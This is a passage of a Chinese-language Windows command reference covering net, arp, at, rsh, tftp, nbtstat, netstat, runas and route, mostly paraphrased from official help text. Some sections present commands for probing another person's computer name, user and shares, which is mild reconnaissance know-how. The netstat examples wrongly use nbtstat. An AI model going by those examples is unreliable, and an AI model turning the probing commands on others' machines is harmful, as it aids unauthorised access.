指定发送的回响请求消息中“数据”字段的长度(以字节表示)。默认值为 32。size 的最大值是 65,527。 十二、Rename (Ren) 更改文件的名称。 例如 ren *.abc *.cba 十三、Set 显示、设置或删除环境变量。如果没有任何参数,set 命令将显示当前环境设置。 十四、Shutdown 允许您关闭或重新启动本地或远程计算机。如果没有使用参数,shutdown 将注销当前用户。 -m ComputerName 指定要关闭的计算机。 -t xx 将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。 -l 注销当前用户,这是默认设置。-m ComputerName 优先。 -s 关闭本地计算机。 -r 关闭之后重新启动。 -a 中止关闭。除了 -l 和 ComputerName 外,系统将忽略其它参数。在超时期间,您只可以使用 -a。 十五、System File Checker (sfc) win下才有,在重新启动计算机后扫描和验证所有受保护的系统文件。 /scannow 立即扫描所有受保护的系统文件。 /scanonce 一次扫描所有受保护的系统文件。 /purgecache 立即清除“Windows 文件保护”文件高速缓存,并扫描所有受保护的系统文件。 /cachesize=x 设置“Windows 文件保护”文件高速缓存的大小,以 MB 为单位。 十六、type 显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件 十七、Tree 图像化显示路径或驱动器中磁盘的目录结构。 十八、Xcopy 复制文件和目录,包括子目录。 /s 复制非空的目录和子目录。如果省略 /s,xcopy 将在一个目录中工作。 /e 复制所有子目录,包括空目录。 十九、copy 将一个或多个文件从一个位置复制到其他位置 二十、del 删除指定文件。 ftp和bat批命令和net和telnet由于子命令太多,这里不说了,不过这几个都是常用到的。 网络常用命令: 网络常用命令: 1.最基本,最常用的,测试物理网络的 ping 192.168.10.88 -t ,参数-t是等待用户去中断测试 2.查看DNS、IP、Mac等 A.Win98:winipcfg B.Win2000以上:Ipconfig/all C.NSLOOKUP:如查看河北的DNS C:\>nslookup Default Server: ns.hesjptt.net.cn Address: 202.99.160.68 >server 202.99.41.2 则将DNS改为了41.2 > pop.pcpop.com Server: ns.hesjptt.net.cn Address: 202.99.160.68 Non-authoritative answer: Name: pop.pcpop.com Address: 202.99.160.212 3.网络信使 Net send 计算机名/IP|* (广播) 传送内容,注意不能跨网段 net stop messenger 停止信使服务,也可以在面板-服务修改 net start messenger 开始信使服务 4.探测对方对方计算机名,所在的组、域及当前用户名 ping -a IP -t ,只显示NetBios名 nbtstat -a 192.168.10.146 比较全的 5.netstat -a 显示出你的计算机当前所开放的所有端口 netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等 6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址 arp -a 7.在代理服务器端 捆绑IP和MAC地址,解决局域网内盗用IP: ARP -s 192.168.10.59 00-50-ff-6c-08-75 解除网卡的IP与MAC地址的绑定: arp -d 网卡IP 8.在网络邻居上隐藏你的计算机 net config server /hidden:yes net config server /hidden:no 则为开启 9.几个net命令 A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。 比如:查看这个IP上的共享资源,就可以 C:\>net view 192.168.10.8 在 192.168.10.8 的共享资源 资源共享名 类型 用途 注释 -------------------------------------- 网站服务 Disk 命令成功完成。 B.查看计算机上的用户帐号列表 net user C.查看网络链接 net use 例如:net use z: \\192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘 D.记录链接 net session 例如: C:\>net session 计算机 用户名 客户类型 打开空闲时间 ------------------------------------------------------------------------------- \\192.168.10.110 ROME Windows 2000 2195 0 00:03:12 \\192.168.10.51 ROME Windows 2000 2195 0 00:00:39 命令成功完成。 10.路由跟踪命令 A.tracert pop.pcpop.com B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的% 11.关于共享安全的几个命令 A.查看你机器的共享资源 net share B.手工删除共享 net share c$ /d net share d$ /d net share ipc$ /d net share admin$ /d 注意$后有空格。 C.增加一个共享: c:\net share mymovie=e:\downloads\movie /users:1 mymovie 共享成功。 同时限制链接用户数为1人。 12.在DOS行下设置静态IP A.设置静态IP CMD netsh netsh>int interface>ip interface ip>set add "本地链接" static IP地址 mask gateway B.查看IP设置 interface ip>show address Arp 显示和修改"地址解析协议 (ARP)"缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。 语法 arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]] 参数 -a [InetAddr] [-N IfaceAddr] 显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项,请使用带有 InetAddr 参数的 arp -a,此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表,请使用 -N IfaceAddr 参数,此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。 -g [InetAddr] [-N IfaceAddr] 与 -a 相同。 -d InetAddr [IfaceAddr] 删除指定的 IP 地址项,此处的 InetAddr 代表 IP 地址。对于指定的接口,要删除表中的某项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项,请使用星号 (*) 通配符代替 InetAddr。 -s InetAddr EtherAddr [IfaceAddr] 向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。 /? 在命令提示符显示帮助。 注释 InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。 物理地址 EtherAddr 由六个字节组成,这些字节用十六进制记数法表示并且用连字符隔开(比如,00-AA-00-4F-2A-9C)。 通过 -s 参数添加的项属于静态项,它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动,这些项会被删除。要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过"计划任务程序"在启动时运行该批处理文件。 只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 范例 要显示所有接口的 ARP 缓存表,可键入: arp -a 对于指派的 IP 地址为 10.0.0.99 的接口,要显示其 ARP 缓存表,可键入: arp -a -N 10.0.0.99 要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项,可键入:arp -s 10.0.0.80 00-AA-00-4F-2A-9C 13.At 计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在"计划"服务运行时使用。如果在没有参数的情况下使用,则 at 列出已计划的命令。 语法 at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}] at [[\\ComputerName] hours:minutes [/interactive] [{/every:date[,...]|/next:date[,...]}] command] 参数 \\computername 指定远程计算机。如果省略该参数,则 at 计划本地计算机上的命令和程序。 ID 指定指派给已计划命令的识别码。 /delete 取消已计划的命令。如果省略了 ID,则计算机中所有已计划的命令将被取消。 /yes 删除已计划的事件时,对来自系统的所有询问都回答"是"。 hours:minutes 指定命令运行的时间。该时间用 24 小时制(即从 00:00 [午夜] 到 23:59)的 小时: 分钟格式表示。 /interactive 对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。 /every: 在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行 command 命令。 date 指定运行命令的日期。可以指定一周的某日或多日(即,键入 M、T、W、Th、F、S、Su)或一个月中的某日或多日(即,键入从 1 到31 之间的数字)。用逗号分隔多个日期项。如果省略了 date,则 at 使用该月的当前日。 /next: 在下一个指定日期(比如,下一个星期四)到来时运行 command。 command 指定要运行的 Windows 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的通用命名协定 (UNC) 符号,而不是远程驱动器号。 /? 在命令提示符显示帮助。 注释 Schtasks 是功能更为强大的超集命令行计划工具,它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务,都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息,请参阅"相关主题"。 使用 at 使用 at 命令时,要求您必须是本地 Administrators 组的成员。 加载 Cmd.exe 在运行命令之前,At 不会自动加载 Cmd.exe (命令解释器)。如果没有运行可执行文件 (.exe),则在命令开头必须使用如下所示的方法专门加载 Cmd.exe: cmd /c dir > c:\test.out。 查看已计划的命令 当不带命令行选项使用 at 时,计划任务会出现在类似于以下格式的表中: Status ID Day Time Command Line OK 1 Each F 4:30 PM net send group leads status due OK 2 Each M 12:00 AM chkstor > check.file OK 3 Each F 11:59 PM backup2.bat 包含标识号 (ID) 当在命令提示下使用带有标识号 (ID) 的 at 命令时,单个任务项的信息会显示在类似于下面的格式中: Task ID:1 Status:OK Schedule:Each F Time of Day:4:30 PM Command:net send group leads status due当计划带有 at 的命令(尤其是带有命令行选项的命令)后,要通过键入不带命令行选项的 at 来检查该命令语法是否输入正确。如果显示在"命令行"列中的信息不正确,请删除该命令,然后重新键入它。如果还不正确,则可以在重新键入该命令时让它少带些命令行选项。查看结果 使用 at 的已经计划的命令作为后台程序运行。运行结果不会显示在计算机上。要将输出重定向到文件,请使用重定向符号 (>)。如果将输出重定向到文件,则不论是在命令行还是在批处理文件中使用 at,都需要在重定向符号之前使用转义符 (^)。例如,要重定向输出到 Output.text 文件,则要键入: at 14:45 c:\test.bat ^>c:\output.txt 执行命令的当前目录为 systemroot 文件夹。 更改系统时间 在使用 at 命令计划了要运行的命令之后,如果更改了计算机的系统时间,则通过键入不带命令行选项的 at 可使 at 计划程序与修改后的系统时间同步。 存储命令 已计划的命令存储在注册表中。这样,如果重新启动"计划"服务,则不会丢失计划任务。 连接到网络驱动器 对于需要访问网络的计划作业,请不要使用已重新定向的驱动器。"计划"服务可能无法访问这些重定向的驱动器,或者,在该计划任务运行时如果有其他用户登录,则这些重定向的驱动器可能不会出现。因此,对于计划作业,请使用 UNC 路径。例如: at 1:00pm my_backup \\server\share 请不要使用下述语法(其中 x: ?表示由用户建立的连接): at 1:00pm my_backup x: 如果计划了一个使用驱动器号的 at 命令来连接共享目录,则应包含一个 at 命令以使在完成该驱动器的使用时断开与驱动器的连接。如果不能断开与驱动器的连接,则在命令提示下,所指派的驱动器号将不可用。 范例 要显示 Marketing 服务器上已计划的命令列表,请键入: at \\marketing 要了解服务器 Corp 上标识号为 3 的命令的详细信息,请键入: at \\corp 3 要计划在上午 8:00 于 Corp 服务器上运行网络共享命令,并将该列表重定向到 Maintenance 服务器的 Corp.txt 文件(位于 Reports 共享目录下)中,请键入: at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports >> \\maintenance\reports\corp.txt" 为了在每五天后的午夜将 Marketing 服务器的硬盘驱动器备份到磁带驱动器,首先创建名为 Archive.cmd 的批处理程序(它含有备份命令),然后计划该批处理程序的运行,为此请键入: at \\marketing 00:00 /every:5,10,15,20,25,30 archive 要取消当前服务器上已计划的所有命令,请按下述方法清除 at 计划信息: at /delete 如果要运行的命令不是可执行 (.exe) 文件,请按如下所示的方法在该命令之前使用 cmd /c 来加载 Cmd.exe: cmd /c dir > c:\test.out。 14.Rsh 在运行 RSH 服务的远程计算机上运行命令。Windows XP 和 Windows 2000 不提供 RSH 服务。Windows 2000 Server Resource Kit 提供名为 Rshsvc.exe 的 RSH 服务。使用不带参数的 rsh 显示帮助。 语法 rsh [Host] [-l UserName] [-n] [Command] 参数 Host 指定运行 command 的远程计算机。 -l UserName 指定远程计算机上使用的用户名。在省略情况下,使用当前登录用户的名称。 -n 将 rsh 的输入重定向到 NULL 设备。这防止本地计算机命令结果的显示。 Command 指定要运行的命令。 /? 在命令提示符显示帮助。 注释 标准操作 rsh 命令将标准输入复制到远程 command,将远程 command 的标准输出复制到其标准输出,将远程 command 的标准错误复制到其标准错误。Rsh 通常在远程命令终止时终止。 使用重定向符号 为了使重定向在远程计算机上发生,要以引号引住重定向符号(例如 ">>")。如果不使用引号,重定向会在本地计算机发生。例如,以下命令将远程文件"RemoteFile"附加到本地文件"LocalFile"中: rsh othercomputer cat remotefile >> localfile 以下命令将远程文件 Remotefile 附加到远程文件 otherremotefile 中: rsh othercomputer cat remotefile ">>" otherremotefile 使用 rsh 在使用已登录到某个域并且运行 Windows XP Professional 的计算机时,该域的主域控制器必须可用于确认用户名或 rsh 命令失败。 .rhosts 文件 .rhosts 文件通常许可 UNIX 系统的网络访问权限。.rhosts 文件列出可以访问远程计算机的计算机名及关联的登录名。在正确配置了 .rhosts 文件的远程计算机上运行 rcp、rexec 或 rsh 命令时,您不必提供远程计算机的登录和密码信息。 .rhosts 文件是一个文本文件,该文件中每一行为一个条目。条目由本地计算机名、本地用户名和有关该条目的所有注释组成。每个条目均由制表符或空格分开,注释用符号 (#) 打头。例如: host7 #This computer is in room 31A .rhosts 文件必须在远程计算机的用户主目录中。有关远程计算机 .rhosts 文件特定执行的详细信息,请参阅远程系统的文档。 只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 范例 要以名称 admin1 在远程计算机 vax1 上执行 telcon 命令,请键入: rsh vax1 -l admin1 telcon 15.Tftp 向运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件或从运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机(尤其是运行 UNIX 的计算机)传输文件。 语法 tftp [-i] [Host] [{get | put}] [Source] [Destination] 参数 -i 指定二进制图像传送模式(也称为八进制模式)。在二进制图像模式下,文件以一个字节为单位进行传输。在传送二进制文件时使用该模式。如果省略了 -i,文件将以 ASCII 模式传送。这是默认的传送模式。该模式将行尾 (EOL) 字符转换为指定计算机的适当格式。传送文本文件时使用该模式。如果文件传送成功,将显示数据传输率。 Host 指定本地或远程计算机。 put 将本地计算机上的 Destination 文件传送到远程计算机上的 Source 文件。因为 TFTP 协议不支持用户身份验证,所以用户必须登录到远程计算机,同时文件在远程计算机上必须可写。 get 将远程计算机上的 Destination 文件传送到本地计算机上的 Source 文件。 Source 指定要传送的文件。 Destination 指定将文件传送到的位置。如果省略了 Destination,将假定它与 Source 同名。 /? 在命令提示符显示帮助。 注释 使用 get 参数 如果将本地计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 put。如果将远程计算机上的文件 FileTwo 传送到远程计算机上的文件 FileOne,则指定 get。 Windows XP 或 Windows 2000 不提供一般用途的 TFTP 服务器。Windows 2000 提供的 TFTP 服务器服务只为 Windows XP 和 Windows 2000 客户端计算机提供远程引导功能。 只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 范例 要从本地计算机将文件 Users.txt 传送到远程计算机 vax1 上的 Users19.txt,请键入: tftp vax1 put users.txt users19.txt 16.Nbtstat 显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。 语法 nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval] 参数 -a remotename 显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。NetBIOS 名称表是运行在该计算机上的应用程序使用的 NetBIOS 名称列表。 -A IPAddress 显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。 -c 显示 NetBIOS 名称缓存内容、NetBIOS 名称表及其解析的各个地址。 -n 显示本地计算机的 NetBIOS 名称表。Registered 中的状态表明该名称是通过广播或 WINS 服务器注册的。 -r 显示 NetBIOS 名称解析统计资料。在配置为使用 WINS 的 Windows XP 计算机上,该参数将返回已通过广播和 WINS 解析和注册的名称号码。 -R 清除 NetBIOS 名称缓存的内容并从 Lmhosts 文件中重新加载带有 #PRE 标记的项目。 -RR 重新释放并刷新通过 WINS 注册的本地计算机的 NetBIOS 名称。 -s 显示 NetBIOS 客户和服务器会话,并试图将目标 IP 地址转化为名称。 -S 显示 NetBIOS 客户和服务器会话,只通过 IP 地址列出远程计算机。 Interval 重新显示选择的统计资料,可以中断每个显示之间的 Interval 中指定的秒数。按 CTRL+C 停止重新显示统计信息。如果省略该参数,netstat 将只显示一次当前的配置信息。 /? 在命令提示符显示帮助。 注释 Nbtstat 命令行参数区分大小写。 下表列出了由 Nbtstat 生成的列标题。标题 说明 Input 接收的字节数。 Output 发送的字节数。 In/Out 该连接是否从计算机(传出)或者其他计算机到本地计算机(传入)。 Lift 名称表缓存项在被清除之前所存留的时间。 Local Name 本地 NetBIOS 名称与连接相关联。 Remote Host 与远程计算机相关的名称或 IP 地址。 <03> 转化为十六进制的 NetBIOS 名称的最后一个字节。每个 NetBIOS 名称长度均为 16 个字符。由于最后一个字节通常有特殊的意义,因为相同的名称(只有最后一个字节不同)可能在一台计算机上出现几次。例如,<20> 在 ASCII 文本中是一个空格。 Type 名称类型。名称可以是单个名称,也可以是组名称。 Status 远程计算机上是否在运行 NetBIOS 服务("已注册"),或同一计算机名是否已注册了相同的服务("冲突")。 State NetBIOS 连接的状态。 下表列出了可能的 NetBIOS 连接状态。状态 说明 已连接 会话已建立。 关联 连接的终结点已经被创建并与 IP 地址关联。 正接听 该终结点对内向连接可用。 空闲 该结束点已被打开单不能接收连接。 正在连接 会话处于连接阶段。在此阶段正在解析所选目标的由名称到 IP 地址的映射。 接受 入站会话当前正在被接受,将在短期内连接。 重新连接 会话将试图重新连接(如果第一次连接失败)。 出站 会话正处于连接阶段。此阶段正在创建 TCP 连接。 入站 入站会话在连接期。 正在断开 会话正在断开连接。 已中断连接 本地计算机已断开连接,并正等待远程系统的确认。 只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 范例 要显示 NetBIOS 计算机名为 CORP07 的远程计算机的 NetBIOS 名称表,请键入: nbtstat -a CORP07 要显示所分配 IP 地址为 10.0.0.99 的远程计算机的 NetBIOS 名称表,请键入: nbtstat -A 10.0.0.99 要显示本地计算机的 NetBIOS 名称表,请键入: nbtstat -n 要显示本地计算机 NetBIOS 名称缓存的内容,请键入: nbtstat -c 要清除 NetBIOS 名称缓存并重新装载本地 Lmhosts 文件中带标记 #PRE 的项目,请键入: nbtstat -R 要释放通过 WINS 服务器注册的 NetBIOS 名称并对其重新注册,请键入: nbtstat -RR 要每隔 5 秒以 IP 地址显示 NetBIOS 会话统计资料,请键入: nbtstat -S 5 17.Netstat 显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。 语法 netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval] 参数 -a 显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。 -e 显示以太网统计信息,如发送和接收的字节数、数据包数。该参数可以与 -s 结合使用。 -n 显示活动的 TCP 连接,不过,只以数字形式表现地址和端口号,却不尝试确定名称。 -o 显示活动的 TCP 连接并包括每个连接的进程 ID (PID)。可以在 Windows 任务管理器中的"进程"选项卡上找到基于 PID 的应用程序。该参数可以与 -a、-n 和 -p 结合使用。 -p Protocol 显示 Protocol 所指定的协议的连接。在这种情况下,Protocol 可以是 tcp、udp、tcpv6 或 udpv6。如果该参数与 -s 一起使用按协议显示统计信息,则 Protocol 可以是 tcp、udp、icmp、ip、tcpv6、udpv6、icmpv6 或 ipv6。 -s 按协议显示统计信息。默认情况下,显示 TCP、UDP、ICMP 和 IP 协议的统计信息。如果安装了 Windows XP 的 IPv6 协议,就会显示有关 IPv6 上的 TCP、IPv6 上的 UDP、ICMPv6 和 IPv6 协议的统计信息。可以使用 -p 参数指定协议集。 -r 显示 IP 路由表的内容。该参数与 route print 命令等价。 Interval 每隔 Interval 秒重新显示一次选定的信息。按 CTRL+C 停止重新显示统计信息。如果省略该参数,netstat 将只打印一次选定的信息。 /? 在命令提示符显示帮助。 注释 与该命令一起使用的参数必须以连字符 (-) 而不是以短斜线 (/) 作为前缀。 Netstat 提供下列统计信息: Proto 协议的名称(TCP 或 UDP)。 Local Address 本地计算机的 IP 地址和正在使用的端口号。如果不指定 -n 参数,就显示与 IP 地址和端口的名称对应的本地计算机名称。如果端口尚未建立,端口以星号(*)显示。 Foreign Address 连接该插槽的远程计算机的 IP 地址和端口号码。如果不指定 -n 参数,就显示与 IP 地址和端口对应的名称。如果端口尚未建立,端口以星号(*)显示。 (state) 表明 TCP 连接的状态。可能的状态如下: CLOSE_WAIT CLOSED ESTABLISHED FIN_WAIT_1 FIN_WAIT_2 LAST_ACK LISTEN SYN_RECEIVED SYN_SEND TIMED_WAIT 有关 TCP 连接状态的信息,请参阅 RFC 793。 只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 范例 要想显示以太网统计信息和所有协议的统计信息,请键入下列命令: netstat -e -s 要想仅显示 TCP 和 UDP 协议的统计信息,请键入下列命令: netstat -s -p tcp udp 要想每 5 秒钟显示一次活动的 TCP 连接和进程 ID,请键入下列命令: nbtstat -o 5 要想以数字形式显示活动的 TCP 连接和进程 ID,请键入下列命令: nbtstat -n -o 18.Runas 允许用户用其他权限运行指定的工具和程序,而不是用户当前登录提供的权限。 语法 runas [{/profile|/noprofile}] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program 参数 /profile 加载用户的配置文件。/profile 是默认值。 /no profile /noprofile 指定不加载用户的配置文件。这使应用程序载入的更加快速,但是在一些应用程序中也会引起错误。 /env 指定当前使用的网络环境,而不是用户的本地环境。 /netonly 指明指定的用户信息只用于远程访问。 /smartcard /smartcard 表示凭据是否是由智能卡提供的。 /showtrustlevels 列出 /trustlevel 开关项。 /trustlevel 指定应用程序运行所在的授权级别。使用 /showtrustlevels 查看可用的信任级别。 /user:UserAccountName 指定在其下运行程序的用户帐户的名称。用户帐户的格式应是 user@domain 或 domain\user。 程序 指定要用在 /user 中指定的帐户运行的程序或命令。 /? 在命令提示符显示帮助。 注释 管理员可以使用一个权限受限制的帐户执行日常、非管理性的任务,只有在执行特定管理任务时,才使用一个权限更大的帐户。要不经过注销再重新登录就完成这样的任务,可以用一般帐户登录,然后使用 runas 命令来运行需要更大权限的工具。 有关 runas 命令的使用范例,请参阅"相关主题"。 尽管 runas 通常由 Administrator 帐户使用,但并非仅限于 Administrator 帐户。任何拥有多个帐户的用户均可以利用备用凭据,使用 runas 运行程序、MMC 控制台或"控制面板"项。 如果要在计算机上使用 Administrator 帐户,对于 /user:,键入下列参数之一: /user:AdministratorAccountName@ComputerName /user:ComputerName\AdministratorAccountName 如果想以域管理员身份使用这个命令,键入下列参数之一: /user:AdministratorAccountName@DomainName /user:DomainName\AdministratorAccountName runas 命令允许您运行程序 (*.exe)、保存的 MMC 控制台 (*.msc)、程序和保存的 MMC 控制台的快捷方式及"控制面板"项。作为另一组(例如"Users"或"Power Users"组)的成员登录到计算机时,可以以管理员的身份运行。 可以使用 runas 命令来启动任何程序、MMC 控制器或"控制面板"项。只要提供适当的用户帐户和密码信息,用户帐户就具有登录到计算机的能力,并且程序、MMC 控制台、"控制面板"项在系统中及对该用户帐户均可用. runas 命令允许您管理其他域的服务器(运行工具的计算机和要管理的服务器在不同的域中)。 如果尝试使用 runas 从网络位置启动程序、MMC 控制台或"控制面板"项,可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。 有些项,例如"打印机"文件夹和桌面项,间接由 Windows 2000 打开,而不能使用 runas 命令启动。 如果 runas 命令失败,则可能是没有运行 RunAs 服务或使用的用户帐户无效。要检查 RunAs 服务的状态,请在"计算机管理"中单击"服务和应用程序",然后单击"服务"。要测试用户帐户,请尝试使用该帐户登录合适的域。 范例 要在本地计算机上以管理员身份启动 Windows 2000 命令提示行实例,请键入: runas /user:localmachinename\administrator cmd 系统提示时,键入管理员密码。 要使用名为 companydomain\domainadmin 的域管理员帐户启动"计算机管理"管理单元实例,请键入:runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt.msc" 当提示时,键入帐户密码。 要使用名为 domain.microsoft.com 的域中的域管理员帐户 user 启动"记事本"实例,请键入: runas /user:user@domain.microsoft.com "notepad my_file.txt" 当提示时,键入帐户密码。 要启动命令提示符行窗口、保存的 MMC 控制台、控制面板项或管理其他地点服务器的程序的一个实例,请键入: runas /netonly /user:domain\username "command" domain\username 必须是有足够权限管理服务器的用户。当提示时,键入帐户密码。 19.Route 在本地 IP 路由表中显示和修改条目。使用不带参数的 route 可以显示帮助。 语法 route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]] 参数 -f 清除所有不是主路由(网掩码为 255.255.255.255 的路由)、环回网络路由(目标为 127.0.0.0,网掩码为 255.255.255.0 的路由)或多播路由(目标为 224.0.0.0,网掩码为 240.0.0.0 的路由)的条目的路由表。如果它与命令之一(例如 add、change 或 delete)结合使用,表会在运行命令之前清除。 -p 与 add 命令共同使用时,指定路由被添加到注册表并在启动 TCP/IP 协议的时候初始化 IP 路由表。默认情况下,启动 TCP/IP 协议时不会保存添加的路由。与 print 命令一起使用时,则显示永久路由列表。所有其它的命令都忽略此参数。永久路由存储在注册表中的位置是 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes。 Command 指定要运行的命令。下表列出了有效的命令。命令 目的 add 添加路由 change 更改现存路由 delete 删除路由 print 打印路由 Destination 指定路由的网络目标地址。目标地址可以是一个 IP 网络地址(其中网络地址的主机地址位设置为 0),对于主机路由是 IP 地址,对于默认路由是 0.0.0.0。 mask subnetmask 指定与网络目标地址相关联的网掩码(又称之为子网掩码)。子网掩码对于 IP 网络地址可以是一适当的子网掩码,对于主机路由是 255.255.255.255 ,对于默认路由是 0.0.0.0。如果忽略,则使用子网掩码 255.255.255.255。定义路由时由于目标地址和子网掩码之间的关系,目标地址不能比它对应的子网掩码更为详细。换句话说,如果子网掩码的一位是 0,则目标地址中的对应位就不能设置为 1。 Gateway 指定超过由网络目标和子网掩码定义的可达到的地址集的前一个或下一个跃点 IP 地址。对于本地连接的子网路由,网关地址是分配给连接子网接口的 IP 地址。对于要经过一个或多个路由器才可用到的远程路由,网关地址是一个分配给相邻路由器的、可直接达到的 IP 地址。 metric Metric 为路由指定所需跃点数的整数值(范围是 1 ~ 9999),它用来在路由表里的多个路由中选择与转发包中的目标地址最为匹配的路由。所选的路由具有最少的跃点数。跃点数能够反映跃点的数量、路径的速度、路径可靠性、路径吞吐量以及管理属性。 if Interface 指定目标可以到达的接口的接口索引。使用 route print 命令可以显示接口及其对应接口索引的列表。对于接口索引可以使用十进制或十六进制的值。对于十六进制值,要在十六进制数的前面加上 0x。忽略 if 参数时,接口由网关地址确定。 /? 在命令提示符显示帮助。 注释 路由表中 跃点数 一列的值较大是由于允许 TCP/IP 根据每个 LAN 接口的 IP 地址、子网掩码和默认网关的配置自动确定路由表中路由的跃点数造成的。默认启动的自动确定接口跃点数确定了每个接口的速度,调整了每个接口的路由跃点数,因此最快接口所创建的路由具有最低的跃点数。要删除大跃点数,请在每个 LAN 连接的 TCP/IP 协议的高级属性中禁用自动确定接口跃点数。 如果在 systemroot\System32\Drivers\Etc 文件夹的本地网络文件中存在适当的条目,名称可以用于 Destination。只要名称可以通过"域名系统" (DNS) 查询这样的标准主机名解析技术分解为 IP 地址,就可以将其用于 Gateway,DNS 查询使用存储在 systemroot\System32\Drivers\Etc 文件夹下的本地主机文件和 NetBIOS 名称解析。 如果是 print 或 delete 命令,可以忽略 Gateway 参数,使用通配符来表示目标和网关。Destination 的值可以是由星号 (*) 指定的通配符。如果指定目标含有一个星号 (*) 或问号 (?),它被看作是通配符,只打印或删除匹配的目标路由。星号代表任意一字符序列,问号代表任一字符。例如,10.*.1, 192.168.*、 127.* 和 *224* 都是星号通配符的有效使用。 使用了无效的目标和子网掩码(网掩码)值的组合,会显示"Route:bad gateway address netmask"错误消息。目标中有一位或多位设置为 1,而其在子网掩码中的对应位设置为 0 时会发生这个错误。可以通过二进制表示法表示目标和子网掩码来检查这种情况。以二进制表示的子网掩码包括表示目标网络地址部分的一连串的 1 和表示目标主机地址部分的一连串的 0 两个部分。查看目标以确定目标的主机地址部分(由子网掩码所定义)是否有些位设置成了 1。 只有 Windows NT 4.0、Windows 2000、Windows Millennium Edition 和 Windows XP 的 route 命令支持 -p 参数。Windows 95 或 Windows 98 的 route 命令不支持该参数。 只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。 范例 要显示 IP 路由表的完整内容,请键入: route print 要显示 IP 路由表中以 10.开始的路由,请键入: route print 10.* 要添加默认网关地址为 192.168.12.1 的默认路由,请键入: route add 0.0.0.0 mask 0.0.0.0 192.168.12.1 要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的路由,请键入: route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的永久路由,请键入: route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1 要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,跃点数为 7 的路由,请键入: route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7 要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,接口索引为 0x3 